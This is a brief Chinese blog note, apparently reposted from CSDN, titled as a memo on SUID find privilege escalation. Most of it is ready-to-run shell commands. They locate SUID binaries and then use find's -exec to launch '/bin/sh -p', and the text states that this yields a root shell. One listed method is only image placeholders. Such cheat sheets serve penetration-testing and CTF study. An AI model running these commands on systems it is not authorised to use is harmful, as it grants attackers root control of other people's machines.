小记 SUID find提权

find提权

姿势一

find / -perm -g=s -type f 2>/dev/null
find . -exec /bin/sh -p \; -quit

姿势二

touch getshell
find / -type f -name getshell -exec "whoami" \;
find / -type f -name getshell -exec "/bin/sh" \;

姿势三

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
如果有find执行
touch test
find . -exec /bin/sh -p \; -quit
这时候,你就拥有了root权限的一个shell。

姿势四

在这里插入图片描述
在这里插入图片描述

发布了17 篇原创文章 · 获赞 3 · 访问量 1072

猜你喜欢

转载自blog.csdn.net/crisprx/article/details/104110725